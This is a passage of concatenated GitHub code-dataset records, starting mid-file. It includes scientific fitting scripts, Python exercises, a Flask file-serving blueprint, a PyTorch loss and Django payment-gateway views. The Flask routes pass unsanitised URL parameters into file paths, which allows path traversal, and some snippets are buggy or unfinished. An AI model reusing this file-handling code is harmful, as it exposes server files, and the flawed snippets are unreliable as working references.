v, vdot = getVelocity(yy, eta0, alpha, tau, i*1e5, W, H, L)\n return np.sum(np.abs(scipy.interpolate.interp1d(t, v)(xl[i])-yl[i]))\n\n def getCost(p):\n print(p)\n return getCostP(1, p[0], p[3], p[4], p[5], p[5]) \\\n + getCostP(2, p[1], p[3], p[4], p[5], p[5]) \\\n + getCostP(3, p[2], p[3], p[4], p[5], p[5])\n\n res = scipy.optimize.minimize(getCost, [eta0, eta0, eta0, alpha, tau, W], bounds=[(0, None), (0, None), (0, None), (0, 1), (0, None), (0, None)])\n\n def curve(y, eta0, alpha, tau, W2):\n #W, H = W2, W2\n yy = np.arange(0, H / 2, 0.1e-6) # [:100]\n t, v, vdot = getVelocity(yy, eta0, alpha, tau, P, W, H, L)\n return scipy.interpolate.interp1d(t, v)(y)\n\n\n def curve2(y):\n #W, H = W2, W2\n yy = np.arange(0, H / 2, 0.1e-6) # [:100]\n t, v, vdot = getVelocity(yy, eta0, alpha, tau, P, W, H, L)\n return scipy.interpolate.interp1d(t, v)(y), scipy.interpolate.interp1d(t, vdot)(y)\n\n\n W = 190e-6\n H = 190e-6\n eta0 = 0.6\n alpha = 0.7\n tau = 1/2000\n xl = [0,x1, x2, x3]\n yl = [0,y1, y2, y3]\n for i in [1,2,3]:\n P = i*1e5\n p, popt = scipy.optimize.curve_fit(curve, xl[i], yl[i], [eta0, alpha, tau, W])\n print(i, p)\n\n eta0, alpha, tau, W2 = p\n yy = np.arange(0, W / 2, 0.1e-6) # [:100]\n plt.plot(xl[i], yl[i], \"o\")\n t, v, vdot = getVelocity(yy, eta0, alpha, tau, P, W, W, L)\n plt.plot(t, v, \"-\")\n\n p, popt = scipy.optimize.curve_fit(curve, x3, y3, [eta0, alpha, tau, W])\n\n plt.clf()\n plt.subplot(121)\n #plt.plot(x1, y1, \"o\")\n #plt.plot(x2, y2, \"o\")\n plt.plot(x3, y3, \"o\")\n eta0, alpha, tau, W = p\n yy = np.arange(0, W / 2, 0.1e-6) # [:100]\n if 0:\n t, v, vdot = getVelocity(yy, eta0, alpha, tau, 1e5, W, W, L)\n plt.plot(t, v, \"-\")\n\n t, v, vdot = getVelocity(yy, eta0, alpha, tau, 2e5, W, W, L)\n plt.plot(t, v, \"-\")\n\n t, v, vdot = getVelocity(yy, eta0, alpha, tau, 3e5, W, W, L)\n plt.plot(t, v, \"-\")\n\n import matplotlib.ticker as ticker\n plt.gca().xaxis.set_major_formatter(ticker.FuncFormatter(lambda x, pos: '{0:g}'.format(x * 1e6)))\n plt.subplot(122)\n\n #tau = 1 / 20\n #alpha = 0.67\n #eta0 = 3.65\n plt.plot(t, eta0/(1+(tau*vdot)**alpha))\n plt.loglog([], [])\n import matplotlib.ticker as ticker\n plt.gca().xaxis.set_major_formatter(ticker.FuncFormatter(lambda x, pos: '{0:g}'.format(x * 1e6)))\n plt.show()\n\nif 0:\n import scipy.optimize\n\n def curve(x, x0, a1, a2):\n return x0 * (1 - (a1*(x/95e-6)**2 - (a2*(x/95e-6))**4))\n\n def derivative(x, x0, d1, a1, d2, a2):\n return -((d1 * (a1 * x) ** d1 + d2*(a2*x) ** d2) * x0) / x\n\n\n #def curve(x, x0, delta, delta2):\n # return x0 * ((2) - (x)**delta - (x)**delta2)\n\n p, popt = scipy.optimize.curve_fit(curve, x, y, [25e-3, 1, 1/95e-6, 2, 1/95e-6])\n print(p)\n xx = np.linspace(0, 95e-6, 100)\n plt.plot(xx, curve(xx, *p))\n\n plt.subplot(122)\n yy = np.diff(curve(xx, *p)) / np.diff(xx)\n plt.plot(xx[:-1]+np.diff(xx)/2, yy)\n plt.plot(xx, derivative(xx, *p))\n\n plt.plot((x[:-1]+0.5*np.diff(x)), grad, \"k--\")\n\n plt.plot(xx, curve(xx, *[25e-3, 1, 1/95e-6, 2, 1/95e-6]))\n\n\n def stressfunc(R, P, L, H): # imputs (radial position and pressure)\n G = P / L # pressure gradient\n pre_factor = (4 * (H ** 2) * G) / np.pi ** 3\n # sum only over odd numbers\n n = np.arange(1, 100, 2)[None, :]\n u_primy = pre_factor * np.sum(((-1) ** ((n - 1) / 2)) * (np.pi / ((n ** 2) * H)) \\\n * (np.sinh((n * np.pi * R[:, None]) / H) / np.cosh(n * np.pi / 2)), axis=1)\n\n stress = np.abs(u_primy)\n return stress\n\n #def eta():\n # return eta0 / 
(1-)","repo_name":"fabrylab/Deformation_Cytometer","sub_path":"figures/panel3_tanktreading/velocity_profile.py","file_name":"velocity_profile.py","file_ext":"py","file_size_in_byte":7154,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} {"seq_id":"12992108731","text":"\n# 1. Manipulate the numbers of a dictionary value\n# given ---> a = {1,2,4,6,8,9,10,5,3,7}\n# required ---> a. sort the numbers from smallest to largest\n# ---> a = {1,2,3,4,5,6,7,8,9,10}\n# b. find the smallest number ---> 1\n# c. find the largest number ---> 10\n\n# 2. check whether a number exists within a dictionary value\n# given ---> d = {1: 10, 2: 20, 3: 30, 4: 40, 5: 50, 6: 60}\n# required ---> a. if input(9) is given, the result is False (*check if exist)\n# b. group the odd numbers ---> d = {1: 10, 3: 30, 5: 50}\n# c. group the even numbers ---> d = {2: 20, 4: 40, 6: 60}\n\n# 3. Create a dictionary value that produces data from the following formula:\n# given ---> the given input value is 5\n# required ---> determine the formula/program logic\n# printed result ---> a. ---> d = {1: 10, 2: 20, 3: 30, 4: 40, 5: 50}\n# printed result ---> b. ---> d = {1: 13, 2: 25, 3: 37, 4: 49, 5: 61}\n\n#--------------------------------------------------------------------------------------------#\n\na = [1,2,4,6,8,9,10,5,3,7]\n\nb = sorted(a, reverse=False)\nprint(\"Numbers sorted from smallest to largest a = \",b)\n\nc = sorted(a, reverse=True)\nprint(\"Numbers sorted from largest to smallest a = \",c)\n\nprint(\"smallest number = \",min(a))\nprint(\"largest number = \",max(a))\n\n#--------------------------------------------------------------------------------------------#\n\n# Dictionary Comprehension\nd = {1: 10, 2: 20, 3: 30, 4: 40, 5: 50, 6: 60}\n\nganjil = dict(\n filter(lambda e:e[0] % 2 == 1, d.items()) \n )\n \ngenap = dict(\n filter(lambda e:e[0] % 2 == 0, d.items()) \n ) \n\nprint(\"Odd number group d = \",ganjil)\nprint(\"Even number group d = \",genap)\n\n#--------------------------------------------------------------------------------------------#\n\nsquares = {}\nangka=int(input(\"\\nEnter a number : \"))\n\n# keys run from 1 to angka so the output matches the expected results above\nfor x in range(1, angka+1):\n squares[x] = x*10\n \nprint(\"Squares group A = \",squares)\n\nincr = 3\nfor x in range(1, angka+1):\n squares[x] = (x*10) + incr\n incr = (incr + 2)\n \nprint(\"Squares group B = \",squares) \n\n\n#--------------------------------------------------------------------------------------------#\n","repo_name":"rahmattri87/latihanPython","sub_path":"studi_kasus_dictionary.py","file_name":"studi_kasus_dictionary.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} {"seq_id":"70974352391","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nA computer that can build the question.\n\nNot just any question:\nNo one really cares about how many Vogons\nit would take to change a lightbulb.\n\nWe need a computer that can build the\nULTIMATE QUESTION. 
This computer will be called DEEP THOUGHT\n\"\"\"\n\nTHE_ANSWER_TO_EVERYTHING = 42\nINFINITE_IMPROBABILITY = 'browning motion'\n","repo_name":"leov2000/is210-week-03-warmup-19","sub_path":"task_09.py","file_name":"task_09.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} {"seq_id":"69901049673","text":"import matplotlib.pyplot as plt\nimport os\nimport re\nimport ReadConfig\nimport pandas as pd\nfrom wordcloud import WordCloud\n\nconfig = ReadConfig.get_config()\nfile_path = config['storage_location']\n\ndef read_csv_to_df(file, header):\n \"\"\"\n Read csv file without header and add a custom header.\n :param:\n file: path to file and filename\n header: custom list of headers\n :return:\n df: resulting dataframe\n \"\"\"\n df = pd.read_csv(file, delimiter= '|', names = header)\n return df\n\n\ndef concat_df(file_list):\n \"\"\"\n Concatenate all dataframes that belong to one annotation type and run.\n :param:\n file_list: list with all dataframes that belong to an annotation type and run\n :return:\n new_df: concatenated dataframe\n \"\"\"\n # start from the first dataframe so a single-element list also works\n new_df = file_list[0]\n for df in file_list[1:]:\n new_df = pd.concat([new_df, df])\n return new_df\n\ndef visualise_most_abundant_terms(GO_des_df, run_id):\n \"\"\"\n Create a wordcloud of the most abundant terms. No filtering is applied to the terms.\n :param:\n GO_des_df: dataframe with summed counts for each GO description\n run_id: run identifier\n \"\"\"\n # make wordcloud\n terms = GO_des_df.GO_description.to_list()\n amount = GO_des_df.counts.to_list()\n cleaned_terms = [term.split('[')[0] for term in terms]\n final_terms = []\n for term, count in zip(cleaned_terms, amount):\n t = term * count\n final_terms.append(t)\n\n final_terms = ''.join(final_terms)\n\n # Create the wordcloud object\n wordcloud = WordCloud(width=480, height=480, margin=0).generate(final_terms)\n\n # Display the generated image:\n plt.imshow(wordcloud, interpolation='bilinear')\n plt.axis(\"off\")\n plt.margins(x=0, y=0)\n pic_name = file_path + run_id + '_wordcloud.png'\n print(pic_name)\n plt.savefig(pic_name)\n\n\ndef combine_results(run_id):\n \"\"\"\n Given a run identifier, collect results for this run. Concatenate the temporary files created per client and peon\n into a big file. Aggregate the counts of the same Annotation identifiers. 
Write the aggregated dataframes to final \n result count files and produce visualisations, which are saved to file as well.\n :param:\n run_id: identifier of the run to be processed\n \"\"\"\n GO_num_pat = r'\\S*GO_number\\S*.csv'\n GO_des_pat = r'\\S*GO_description\\S*.csv'\n EC_num_pat = r'\\S*EC_number\\S*.csv'\n\n # create lists to collect dataframes from files in\n GO_num_file_list = []\n GO_des_file_list = []\n EC_num_file_list = []\n\n # create dataframes from files found with regex and append to dataframe lists\n path = file_path + run_id + '/'\n for file in os.listdir(path):\n if re.match(GO_num_pat, file):\n header = ['GO_number', 'counts']\n path_to_file = path + file\n df = read_csv_to_df(path_to_file, header)\n GO_num_file_list.append(df)\n if re.match(GO_des_pat, file):\n path_to_file = path + file\n header = ['GO_description', 'counts']\n df = read_csv_to_df(path_to_file, header)\n GO_des_file_list.append(df)\n if re.match(EC_num_pat, file):\n header = ['EC_number', 'counts']\n path_to_file = path + file\n df = read_csv_to_df(path_to_file, header)\n EC_num_file_list.append(df)\n \n # concatenate all files into one dataframe per result type\n GO_num_new_df = concat_df(file_list = GO_num_file_list)\n GO_des_new_df = concat_df(file_list = GO_des_file_list)\n EC_num_new_df = concat_df(file_list = EC_num_file_list)\n \n # aggregate concatenated dataframes to final dataframes\n final_GO_num_df = GO_num_new_df.groupby('GO_number').sum().reset_index()\n final_GO_des_df = GO_des_new_df.groupby('GO_description').sum().reset_index()\n final_EC_num_df = EC_num_new_df.groupby('EC_number').sum().reset_index()\n print('GO_numbers condensed', len(final_GO_num_df.index))\n print('GO_descriptions condensed', len(final_GO_des_df.index))\n print('EC_numbers condensed', len(final_EC_num_df.index))\n print('Total GO number counts', final_GO_num_df.counts.sum())\n print('Total GO description counts', final_GO_des_df.counts.sum())\n print('Total EC number counts', final_EC_num_df.counts.sum())\n\n # create file name without extension\n GO_num_file_name = f'{file_path}{run_id}_final_GO_number_counts'\n GO_des_file_name = f'{file_path}{run_id}_final_GO_description_counts'\n EC_num_file_name = f'{file_path}{run_id}_final_EC_number_counts'\n\n # write final dataframes to csv file and produce barplots\n final_GO_num_df.to_csv(f'{GO_num_file_name}.csv', index = False)\n final_GO_des_df.to_csv(f'{GO_des_file_name}.csv', index = False)\n final_EC_num_df.to_csv(f'{EC_num_file_name}.csv', index = False)\n final_GO_num_df.sort_values(['counts'], ascending=False).head(20).to_csv(f'{GO_num_file_name}_top_20.csv', index = False)\n final_EC_num_df.sort_values(['counts'], ascending=False).head(20).to_csv(f'{EC_num_file_name}_top_20.csv', index = False)\n\n # visualise the most abundant GO terms\n visualise_most_abundant_terms(final_GO_des_df, run_id)\n\n\nif __name__ == '__main__':\n run_ids = ['run_1', 'run_2']\n for run_id in run_ids:\n combine_results(run_id)\n","repo_name":"ChiaraBecht/Programming3","sub_path":"Assignment6/produce_final_results.py","file_name":"produce_final_results.py","file_ext":"py","file_size_in_byte":5359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"21679253995","text":"def solution(numbers):\n answer = ''\n for idx, number in enumerate(numbers):\n numbers[idx] = [str(number) * 3, len(str(number))]\n numbers.sort(reverse = True)\n for number in numbers:\n num, length = number[0], number[1]\n answer += num[:length]\n return 
str(int(answer))\n\ndef solution2(numbers):\n    answer = ''\n    zero_cnt = 0  # count zeros so they can be appended at the end\n    padded = []\n    for number in numbers:\n        if number == 0:\n            zero_cnt += 1\n            continue\n        arr = list(map(int, str(number)))\n        real = len(arr)\n        while len(arr) < 4:\n            arr.append(arr[0])\n        padded.append(arr + [real])\n    # sort digit-padded numbers descending; on ties the shorter original comes first\n    padded.sort(key = lambda x : (-x[0], -x[1], -x[2], -x[3], x[4]))\n\n    for number in padded:\n        i = 0\n        while i < number[-1]:\n            answer += str(number[i])\n            i += 1\n    # zeros always belong at the end; int() strips an all-zero result to a single 0\n    answer += '0' * zero_cnt\n    return str(int(answer))\n\nnumbers = [0, 1, 30]\nprint(solution(numbers))","repo_name":"430lyj/Algorithm","sub_path":"python/programmers_42746.py","file_name":"programmers_42746.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"24757356353","text":"#!/usr/bin/env python3\n\"\"\"Solution to chapter 3, exercise 11: alphabetize_names\"\"\"\n\nimport operator\n\n\nPEOPLE = [{'first': 'Reuven', 'last': 'Lerner',\n           'email': 'reuven@lerner.co.il'},\n          {'first': 'Donald', 'last': 'Trump',\n           'email': 'president@whitehouse.gov'},\n          {'first': 'Vladimir', 'last': 'Putin',\n           'email': 'president@kremvax.ru'}\n          ]\n\n\ndef alphabetize_names(list_of_dicts):\n    \"\"\"Take a list of dicts describing people,\neach with first/last/email as keys.\n\nReturn a new list of dicts,\nsorted first by last name and then by first name.\n\nIf passed an empty list, then return an empty list.\n\"\"\"\n    return sorted(list_of_dicts, key=operator.itemgetter('last', 'first'))\n","repo_name":"reuven/python-workout","sub_path":"ch03-lists-tuples/e11_alphabetize_names.py","file_name":"e11_alphabetize_names.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":203,"dataset":"github-code","pt":"27"} +{"seq_id":"5862718525","text":"from flask import Blueprint, jsonify, request, send_file\nfrom connection import DB\nimport os\nfrom src.utils.helpers import Helpers as H\nfrom config import APP_CONFIG\n\nSTORAGE_BLUEPRINT = Blueprint(\"storage_blueprint\", __name__)\n# STORAGE = os.path.normpath(os.path.join(os.path.dirname( __file__ ), '..', 'storage'))\n\n@STORAGE_BLUEPRINT.route(\"/<site_name>/<file_name>\", methods=[\"GET\"])\ndef get_map(site_name, file_name):\n    try:\n        img_path = f\"{APP_CONFIG['storage']}/{site_name.upper()}/{file_name}\"\n        ret_val = send_file(img_path, mimetype='image/jpg')\n    except Exception as e:\n        print(e)\n        ret_val = \"#\"\n    return ret_val\n\n@STORAGE_BLUEPRINT.route(\"/profile_picture\", methods=[\"POST\"])\ndef upload_profilepicture():\n    try:\n        files = request.files\n        file_path = f\"{APP_CONFIG['storage']}/profile_pictures/\"\n        print(f\"{file_path}/profile_pictures\")\n        for fetch_filename in files:\n            file = request.files[fetch_filename]\n            final_path = H.upload(file=file, file_path=file_path)\n        response = {'status': 200}\n    except Exception as err:\n        print(err)\n        response = {'status': 400}\n    finally:\n        return jsonify(response) \n\n@STORAGE_BLUEPRINT.route(\"/<site_name>/<file_name>\", methods=[\"GET\"])\ndef download_map(site_name, file_name):\n    try:\n        img_path = f\"{APP_CONFIG['storage']}/{site_name}/{file_name}\"\n        ret_val = send_file(img_path, mimetype='image/jpg')\n    except Exception as e:\n        ret_val = \"#\"\n    return ret_val","repo_name":"dynatech/SamarCluster","sub_path":"server/dynaslope3/src/file_transfer/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"41797696420","text":"from pathlib import Path\nimport os\nimport csv, subprocess\nimport 
sys\n\nfailedRuns = []\npath = \"/users/PAS0654/osu8354/ARA_cvmfs/source/AraRoot/analysis/ARA_analysis/ARA_SourceSearch/OSC_scripts/step6-save_vals_for_cuts/logs/\"\npathlist = Path(path).glob('**/*.out')\nfor path in pathlist:\n    # because path is object not string\n    path_in_str = str(path)\n    with open(path_in_str, 'r') as f:\n        for line in f.readlines():\n            if 'core dumped' in line:\n#                print(line)\n                toParse = line\n                splitLine = toParse.split()\n                runline = splitLine[len(splitLine)-2]\n                print(\" \".join(splitLine[8:])+\" &\")\n\n#            runline=runline.strip(\"/var/spool/slurmd/job4063219/slurm_script: line 17: 150015 Bus error            (core dumped) \")\n#            failedRun = runline.partition(\"processed_station_2_run_\")[2].strip(\".\")\n# #            print(failedRun)\n#            failedRuns.append(failedRun)\n# print(\"%i failed runs\"%len(failedRuns))\n# failedRuns.sort()\n# print(failedRuns)\n","repo_name":"toej93/ARA_analysis","sub_path":"ARA_SourceSearch/OSC_scripts/step6-save_vals_for_cuts/failedJobs/reSubmit.py","file_name":"reSubmit.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"14846618701","text":"import random\nimport torch \nfrom torch.nn import functional \nfrom torch.autograd import Variable \n\nclass SimilarityLoss(torch.nn.Module):\n    def __init__(self, margin=2.0):\n        # initialize the base nn.Module so parameters/buffers are registered\n        super(SimilarityLoss, self).__init__()\n        self.margin = margin\n\n    # euclidean distance\n    # harder negative mining thanks to jimmy yan\n    def _forward(self, output1, output2, quant=100) -> torch.Tensor:\n        # compute the positive loss of all the data\n        pos_loss = torch.pow(torch.norm(output2.sub(output1), dim=1), 2)\n        neg_loss = torch.empty_like(pos_loss)\n\n        quant = min(quant, output1.size(0)-1)\n        # find the hardest negative example\n        for i, o_i in enumerate(output1):\n            values, indices = torch.topk(torch.norm(output2.sub(o_i), dim=1), quant, largest=False)\n\n            rn = int(random.random()*quant)\n            while indices[rn] == i:\n                rn = int(random.random()*quant)\n\n            neg_loss[i] = self.margin - values[rn]\n\n        neg_loss = torch.clamp(neg_loss, 0.0)\n\n        return torch.mean(pos_loss) + torch.mean(neg_loss)\n\ndef MorphemeLoss():\n    return torch.nn.NLLLoss()\n\n# helper function for MaskedCrossEntropy\ndef sequence_mask(sequence_length, max_len=None):\n    if max_len is None:\n        max_len = sequence_length.data.max()\n    batch_size = sequence_length.size(0)\n    # arange excludes the endpoint, so this covers 0..max_len-1\n    seq_range = torch.arange(0, max_len).long()\n    seq_range_expand = seq_range.unsqueeze(0).expand(batch_size, max_len)\n    seq_range_expand = Variable(seq_range_expand)\n    if sequence_length.is_cuda:\n        seq_range_expand = seq_range_expand.cuda()\n    seq_length_expand = (sequence_length.unsqueeze(1)\n                         .expand_as(seq_range_expand))\n    return seq_range_expand < seq_length_expand\n\n\ndef MaskedCrossEntropy(logits, target, length):\n    length = Variable(torch.LongTensor(length)).cuda()\n\n    \"\"\"\n    Args:\n        logits: A Variable containing a FloatTensor of size\n            (batch, max_len, num_classes) which contains the\n            unnormalized probability for each class.\n        target: A Variable containing a LongTensor of size\n            (batch, max_len) which contains the index of the true\n            class for each corresponding step.\n        length: A Variable containing a LongTensor of size (batch,)\n            which contains the length of each data in a batch.\n\n    Returns:\n        loss: An average loss value masked by the length.\n    \"\"\"\n\n    # logits_flat: (batch * max_len, num_classes)\n    logits_flat = logits.view(-1, logits.size(-1))\n    # log_probs_flat: (batch * max_len, num_classes)\n    log_probs_flat = functional.log_softmax(logits_flat, dim=-1)\n    # target_flat: (batch * max_len, 1)\n    target_flat = target.view(-1, 1)\n    # losses_flat: (batch * max_len, 1)\n    losses_flat = -torch.gather(log_probs_flat, dim=1, index=target_flat)\n    # losses: (batch, max_len)\n    losses = losses_flat.view(*target.size())\n    # mask: (batch, max_len)\n    mask = sequence_mask(sequence_length=length, max_len=target.size(1))\n    losses = losses * mask.float()\n    loss = losses.sum() / length.float().sum()\n    return loss\n","repo_name":"kpister/pnorm","sub_path":"src/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":3068,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"1727669016","text":"from typing import List\n\n\nclass Solution:\n    def findMedianSortedArrays(self, nums1: List[int], nums2: List[int]) -> float:\n        \n        # make sure A is shorter array\n        A,B = nums1, nums2\n        total = len(nums1)+len(nums2)\n        half = total//2\n        \n        if len(A)>len(B):\n            A, B = B, A\n\n        #return the value when there is only one value in two lists\n        if len(A)==0 and len(B)==1:\n            return B[0]\n        \n        left, right = 0, len(A)-1\n        while True:\n            # index point to the left most of the left partition\n            i = (left+right)//2 # index for A\n            j = half-i-2 # index for B\n            \n            #get the value of each partition edge\n\n            if i>=0: Aleft = A[i]\n            else: Aleft = float(\"-infinity\")\n            \n            if (i+1)<len(A): Aright = A[i+1]\n            else: Aright = float(\"infinity\")\n            \n            if j>=0: Bleft = B[j]\n            else: Bleft = float(\"-infinity\")\n            \n            if (j+1)<len(B): Bright = B[j+1]\n            else: Bright = float(\"infinity\")\n            \n            # partition is correct when each left value is <= the opposite right value\n            if Aleft<=Bright and Bleft<=Aright:\n                # odd total: median is the smallest element of the right partition\n                if total % 2:\n                    return min(Aright, Bright)\n                # even total: average the two middle elements\n                return (max(Aleft, Bleft) + min(Aright, Bright)) / 2\n            elif Aleft>Bright:\n                right = i-1\n            else:\n                left = i+1\n","repo_name":"qiutianchloe/leetcode","sub_path":"MedianofTwoSortedArrays/MedianofTwoSortedArrays.py","file_name":"MedianofTwoSortedArrays.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"12381623839","text":"import uuid\nimport requests\nimport json\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework import status\nfrom django.conf import settings\nfrom django.db import transaction\nimport razorpay\nfrom .models import Purchase, PurchaseSession\nfrom .serializers import PurchaseSerializer, PurchaseSessionSerializer\nfrom course.models import Levels, Plans, Schedule, Course\nfrom course.serializers import PlansSerializer\nfrom user.models import User, Kid \nfrom .emails import sendBookingConfirmationMail\n# Create your views here.\n\n@api_view(http_method_names=['POST'])\n@permission_classes([IsAuthenticated])\ndef CreatePurchase(request):\n    payment_method_chosen = request.data.get('payment_method_chosen')\n    course_level_id = request.data.get('course_level_id')\n    schedule_id = request.data.get('schedule_id')\n    plan_selected_id = request.data.get('plan_selected_id')\n    kids_selected_ids = request.data.get('kids_selected_ids')\n    purchase_price = request.data.get('purchase_price')\n    purchase_session_identifier = request.data.get('purchase_session')\n\n    try:\n        user = request.user\n    except User.DoesNotExist:\n        return Response({'error': 'Invalid user ID'}, status=status.HTTP_400_BAD_REQUEST)\n\n    try:\n        course_level = Levels.objects.get(id=course_level_id)\n    except Levels.DoesNotExist:\n        return Response({'error': 'Invalid course level ID'}, status=status.HTTP_400_BAD_REQUEST)\n\n    try:\n        schedule = Schedule.objects.get(id=schedule_id)\n    except Schedule.DoesNotExist:\n        return Response({'error': 'Invalid schedule ID'}, status=status.HTTP_400_BAD_REQUEST)\n\n    try:\n        plan_selected = 
Plans.objects.get(id=plan_selected_id)\n except Plans.DoesNotExist:\n return Response({'error': 'Invalid plan selected ID'}, status=status.HTTP_400_BAD_REQUEST)\n\n try:\n purchase_session = PurchaseSession.objects.get(identifier=purchase_session_identifier)\n except Exception as e:\n purchase_session = None\n\n kids_selected = user.my_kids.filter(id__in=kids_selected_ids)\n\n new_booking_id = course_level.to_course.slug[:3] + str(uuid.uuid4().hex[:7])\n purchase = Purchase.objects.create(\n user=user,\n course_level=course_level,\n schedule=schedule,\n plan_selected=plan_selected,\n purchase_price=purchase_price,\n booking_id= new_booking_id.upper()\n )\n purchase.kids_selected.set(kids_selected)\n purchase.purchase_session = purchase_session\n\n if schedule.seats_left <= 0 or schedule.seats_left < purchase.kids_selected.count():\n return Response({\"error\": \"zero_slots\"}, status=status.HTTP_400_BAD_REQUEST)\n\n \"\"\"DEMO PLAN SELECTED\"\"\"\n if purchase_price == 0 or purchase_price < 1:\n purchase.payment_status = 'PAID'\n purchase.payment_platform = 'Free Purchase'\n schedule.seats_occupied = int(schedule.seats_occupied) + kids_selected.count()\n purchase.order_id = \"free_purchase_\" + str(user.username) + str(uuid.uuid4().hex[:8])\n purchase.payment_id = \"Free Purchase\"\n purchase.order_signature = \"Free Purchase\"\n schedule.save()\n \"\"\"Update the demo_course table for Kids\"\"\"\n with transaction.atomic():\n for kid in kids_selected:\n kid.demo_courses.add(course_level.to_course)\n purchase.save()\n try:\n sendBookingConfirmationMail(\n user_email=user.email,\n user_first_name=user.first_name,\n course_name=course_level.to_course.name,\n level_name=course_level.name,\n booking_id=purchase.booking_id\n )\n print(\"DEMO\")\n except Exception as e:\n # print(e)\n pass\n data = {}\n data['method'] = 'Free Purchase'\n data['purchase_data'] = PurchaseSerializer(purchase).data\n return Response(data=data, status=status.HTTP_201_CREATED)\n\n\n \"\"\"RAZORPAY ORDER\"\"\"\n if payment_method_chosen == 'Razorpay' and purchase_price > 0:\n client = razorpay.Client(auth=(settings.RAZORPAY_KEY_ID, settings.RAZORPAY_KEY_SECRET))\n DATA = {\n \"amount\": float(purchase.purchase_price) * 100,\n \"currency\": \"INR\",\n \"receipt\": f\"receipt@Razorpay{purchase.id}\",\n \"notes\": {\n \"purchase_id\": purchase.id,\n }\n }\n try:\n razorpay_order = client.order.create(data=DATA)\n purchase.order_id = razorpay_order['id']\n purchase.payment_platform = 'Razorpay'\n purchase.save()\n response_data = {\n 'message': 'Purchase created successfully',\n 'order_created': True, \n 'order': razorpay_order,\n 'RAZORPAY_KEY_ID': settings.RAZORPAY_KEY_ID ,\n 'method': 'Razorpay',\n\n }\n return Response(response_data, status=status.HTTP_201_CREATED)\n except:\n return Response({'error': 'Some error ocurred.'}, status=status.HTTP_400_BAD_REQUEST)\n \n \"\"\"CASHFREE\"\"\"\n if payment_method_chosen == 'Cashfree' and purchase_price > 0:\n url = f\"{settings.CASHFREE_ENDPOINT}/orders\"\n payload = {\n \"customer_details\": {\n \"customer_id\": user.username,\n \"customer_name\": user.get_full_name(),\n \"customer_email\": user.email,\n \"customer_phone\": str(user.phone_number.national_number)\n },\n \"order_amount\": float(purchase.purchase_price),\n \"order_currency\": \"INR\",\n \"order_id\": new_booking_id.upper()\n }\n headers = {\n \"accept\": \"application/json\",\n \"x-client-id\": settings.CASHFREE_APP_ID,\n \"x-client-secret\": settings.CASHFREE_SECRET_KEY,\n \"content-type\": 
\"application/json\",\n \"x-api-version\": \"2023-08-01\",\n }\n try:\n response = requests.post(url, json=payload, headers=headers)\n res_data = json.loads(response.text)\n purchase.payment_platform = 'Cashfree'\n purchase.order_id = res_data['cf_order_id']\n purchase.payment_id = 'TBD'\n purchase.order_signature = '---'\n schedule.save()\n purchase.save()\n response_data = {\n 'message': 'Purchase created successfully',\n 'order_created': True, \n 'order': res_data,\n 'method': 'Cashfree',\n }\n return Response(response_data, status=status.HTTP_201_CREATED)\n except Exception as e:\n print(\"CASHFREE\", e)\n return Response({'error': 'Some error ocurred.'}, status=status.HTTP_400_BAD_REQUEST)\n \n\n\n@api_view(http_method_names=['POST'])\n@permission_classes([IsAuthenticated])\ndef successPurchaseRazorpay(request):\n razorpay_payment_id = request.data.get('razorpay_payment_id')\n razorpay_order_id = request.data.get('razorpay_order_id')\n razorpay_signature = request.data.get('razorpay_signature')\n purchase_id = request.data.get('purchase_id')\n\n try:\n purchase = Purchase.objects.get(id=purchase_id, user=request.user)\n purchase.payment_id = razorpay_payment_id\n purchase.order_signature = razorpay_signature\n if purchase.order_id == razorpay_order_id:\n purchase.payment_status = 'PAID'\n purchase.schedule.seats_occupied = int(purchase.schedule.seats_occupied) + purchase.kids_selected.count()\n purchase.schedule.save()\n try:\n purchase.purchase_session.session_status = 'COMPLETED'\n purchase.purchase_session.save()\n except Exception as e:\n pass\n purchase.save()\n purchase_data = PurchaseSerializer(purchase)\n return Response({\"updated\": True, 'purchase_data': purchase_data.data}, status=status.HTTP_200_OK)\n else :\n return Response({\"updated\": False, \"message\": \"Order ID didn't matched\"}, status=status.HTTP_400_BAD_REQUEST)\n\n except Purchase.DoesNotExist:\n return Response({'error': 'Purchase Does Not Exists'}, status=status.HTTP_400_BAD_REQUEST)\n\n@api_view(http_method_names=['POST'])\n@permission_classes([IsAuthenticated])\ndef failedPurchaseRazorpay(request):\n razorpay_payment_id = request.data.get('razorpay_payment_id')\n razorpay_order_id = request.data.get('razorpay_order_id')\n razorpay_signature = request.data.get('razorpay_signature')\n purchase_id = request.data.get('purchase_id')\n\n try:\n purchase = Purchase.objects.get(id=purchase_id, user=request.user)\n purchase.payment_id = razorpay_payment_id\n purchase.order_signature = razorpay_signature\n if purchase.order_id == razorpay_order_id:\n purchase.payment_status = 'FAILED'\n purchase.payment_platform = 'Razorpay'\n purchase.save()\n return Response({\"updated\": True}, status=status.HTTP_200_OK)\n else :\n return Response({\"updated\": False, \"message\": \"Order ID didn't matched\"}, status=status.HTTP_400_BAD_REQUEST)\n\n except Purchase.DoesNotExist:\n return Response({'error': 'Purchase Does Not Exists'}, 